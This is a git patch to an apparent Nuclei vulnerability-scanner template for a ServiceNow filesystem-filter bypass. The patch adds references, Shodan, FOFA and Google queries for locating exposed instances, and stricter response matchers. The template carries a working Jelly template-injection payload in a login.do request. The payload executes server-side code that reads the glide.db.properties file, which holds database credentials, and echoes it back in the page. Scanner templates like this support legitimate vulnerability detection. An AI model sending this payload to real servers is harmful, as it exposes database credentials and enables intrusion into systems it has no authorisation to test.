From 20cb50d9f3104c9e48b855b2b62b9aa9489b695a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 11 Jul 2024 12:43:50 +0530
Subject: [PATCH] minor-update

---
 .../servicenow-filesystem-bypass.yaml         | 32 +++++++++++++++++--
 1 file changed, 29 insertions(+), 3 deletions(-)

diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml
index 13c1ab80ca..77ef0440cd 100644
--- a/http/misconfiguration/servicenow-filesystem-bypass.yaml
+++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml
@@ -4,16 +4,42 @@ info:
   name: Service Now - Filesystem Filter Bypass
   author: DhiyaneshDk
   severity: high
+  reference:
+    - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
+  classification:
+    cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: servicenow
+    product: servicenow
+    shodan-query:
+      - http.favicon.hash:1701804003
+      - http.title:"servicenow"
+    fofa-query:
+      - icon_hash=1701804003
+      - title="servicenow"
+    google-query: intitle:"servicenow"
+  tags: cve,cve2024,servicenow,rce
 
 http:
   - raw:
       - |
-        GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
+        GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
         Host: {{Hostname}}
-
+        
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - 'db.user'
+          - "glide.db.user"
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200